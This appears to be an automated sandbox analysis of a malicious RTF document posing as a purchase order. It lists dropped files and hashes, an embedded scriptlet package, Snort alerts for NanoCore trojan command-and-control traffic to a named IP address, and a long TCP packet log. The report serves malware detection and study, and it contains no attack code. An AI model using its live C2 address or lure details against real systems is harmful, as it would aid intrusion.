                                SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                Malicious:false
                                Reputation:unknown
                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
                                C:\Users\user\Desktop\~$W PO1100372954 -.doc
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.4311600611816426
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                Malicious:false
                                Reputation:unknown
                                Preview: .user..................................................A.l.b.u.s.............p.......................................P......................z...............x...
                                C:\Windows\System32\rfxvmt.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):37376
                                Entropy (8bit):5.7181012847214445
                                Encrypted:false
                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                Malicious:false
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 0%, Browse
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                Static File Info

                                General

                                File type:Rich Text Format data, unknown version
                                Entropy (8bit):3.1682008800082904
                                TrID:
                                • Rich Text Format (5005/1) 55.56%
                                • Rich Text Format (4004/1) 44.44%
                                File name:NEW PO1100372954 -.doc
                                File size:234750
                                MD5:afe48e30fc3f12c2b6ad7d19ae1fff8e
                                SHA1:2ded99867d8b3e9499b10743ae732efec19ccc8e
                                SHA256:ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
                                SHA512:9a2bcef0c2f34c68fab71898cdebf2deb8c937fb87b5195fc99e5f4e6bbc156d6549a6fb0535ba4602b95ff1e7bff4404b30ce695c7498be6e21d48a71f2bb58
                                SSDEEP:1536:itW7qA4b64DJ/b6lP1JsvggNNzoBxqM8RLlypLBCy/ndzFz76mAg5eeVhMDw5wfv:itW7qA4b64ggaeG/ndzFtr5RDAw5wfv
                                File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                File Icon

                                Icon Hash:e4eea2aaa4b4b4a4

                                Static RTF Info

                                Objects

                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                000000961h2embeddedpackage20578abdtfhgXgdghgh.ScTC:\jsdsTggf\abdtfhgXGdghgh.ScTC:\CbkepaDw\abdtfhghgdghgh.ScTno
                                10000B188h2embeddedOLE2LInk2560no

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                08/02/21-11:00:55.449858TCP2025019ET TROJAN Possible NanoCore C2 60B491708234192.168.2.22203.159.80.186
                                08/02/21-11:01:04.085356TCP2025019ET TROJAN Possible NanoCore C2 60B491718234192.168.2.22203.159.80.186
                                08/02/21-11:01:10.279735TCP2025019ET TROJAN Possible NanoCore C2 60B491728234192.168.2.22203.159.80.186
                                08/02/21-11:01:11.005994TCP2025019ET TROJAN Possible NanoCore C2 60B491728234192.168.2.22203.159.80.186
                                08/02/21-11:01:15.859665TCP2025019ET TROJAN Possible NanoCore C2 60B491738234192.168.2.22203.159.80.186
                                08/02/21-11:01:26.222099TCP2025019ET TROJAN Possible NanoCore C2 60B491748234192.168.2.22203.159.80.186
                                08/02/21-11:01:26.832941TCP2025019ET TROJAN Possible NanoCore C2 60B491748234192.168.2.22203.159.80.186
                                08/02/21-11:01:31.194297TCP2025019ET TROJAN Possible NanoCore C2 60B491758234192.168.2.22203.159.80.186
                                08/02/21-11:01:36.418179TCP2025019ET TROJAN Possible NanoCore C2 60B491768234192.168.2.22203.159.80.186
                                08/02/21-11:01:41.681580TCP2025019ET TROJAN Possible NanoCore C2 60B491778234192.168.2.22203.159.80.186
                                08/02/21-11:01:52.872032TCP2025019ET TROJAN Possible NanoCore C2 60B491788234192.168.2.22203.159.80.186
                                08/02/21-11:01:58.316930TCP2025019ET TROJAN Possible NanoCore C2 60B491798234192.168.2.22203.159.80.186
                                08/02/21-11:01:58.959256TCP2025019ET TROJAN Possible NanoCore C2 60B491798234192.168.2.22203.159.80.186
                                08/02/21-11:02:03.607658TCP2025019ET TROJAN Possible NanoCore C2 60B491808234192.168.2.22203.159.80.186

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 2, 2021 10:59:54.181540012 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.219240904 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.219322920 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.220050097 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.251251936 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251281023 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251302004 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251323938 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.251357079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.251631021 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282464981 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282495975 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282511950 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282535076 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282556057 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282576084 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282597065 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282608986 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282615900 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.282643080 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282646894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.282649994 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311568975 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311600924 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311621904 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311642885 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311640978 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311666965 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311675072 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311680079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311682940 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311690092 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311697006 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311709881 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311727047 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311731100 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311738014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311753035 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311774015 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311764956 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311790943 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311794996 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311800003 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311817884 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311834097 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311841011 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311841965 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311863899 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311875105 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311886072 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311901093 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311906099 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311908960 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311945915 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.313561916 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341093063 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341123104 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341144085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341165066 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341166973 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341186047 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341198921 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341202974 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341207027 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341212988 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341232061 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341247082 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341253042 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341264963 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341274977 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341289997 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341295004 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341310024 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341315985 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341325998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341337919 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341353893 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341358900 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341358900 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341381073 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341389894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341403961 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341408014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341425896 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341435909 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341447115 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341456890 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341468096 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341471910 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341489077 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341497898 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341511011 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341520071 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341531992 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341538906 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341552973 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341561079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341577053 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341583967 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341598988 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341605902 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341619968 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341628075 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341640949 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341650009 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341661930 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341670036 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341681957 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341684103 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341702938 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341711998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341727018 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341739893 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341748953 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341749907 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341773033 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341780901 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341801882 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.343333006 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370685101 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370712042 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370733023 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370744944 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370753050 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370774031 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370776892 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370779991 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370781898 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370794058 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370798111 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370814085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370824099 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370835066 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370837927 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370858908 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370867968 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370878935 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370893955 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370898962 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370906115 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370920897 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370928049 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370942116 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370949030 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370964050 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370970964 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.370985031 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.370991945 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371009111 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371016979 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371032000 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371040106 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371052027 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371061087 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371073008 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371078014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371093988 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371102095 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371125937 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371134043 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371156931 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371164083 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371179104 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371185064 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371210098 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371301889 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371324062 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371336937 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371347904 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371359110 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371380091 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371388912 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371400118 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371411085 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371422052 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371422052 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371443987 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371452093 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371464968 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371474028 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371485949 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371494055 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371505976 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371515036 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371529102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371536970 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371551037 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371556997 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371571064 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371581078 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371592045 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371592999 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371613026 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371622086 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371634007 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371643066 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371654034 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371656895 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371675014 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371684074 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371697903 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371697903 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371718884 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371727943 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371740103 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371747971 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371762037 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371767998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371782064 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371797085 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371803045 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371810913 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371824026 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371831894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371845007 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.371854067 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.371874094 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.372059107 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399518967 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399560928 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399590015 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399619102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399647951 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399672985 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399676085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.399705887 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399709940 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.399712086 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400161982 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400204897 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400587082 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400619984 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400635958 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400650024 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400679111 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400684118 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400684118 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400715113 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400733948 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400746107 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400743961 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400777102 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400782108 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400806904 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400820017 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400839090 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400847912 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400870085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400878906 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400904894 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400907993 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400938988 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400952101 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.400970936 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.400974989 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401002884 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401011944 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401035070 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401043892 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.401065111 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.401077032 CEST4916580192.168.2.22203.159.80.186
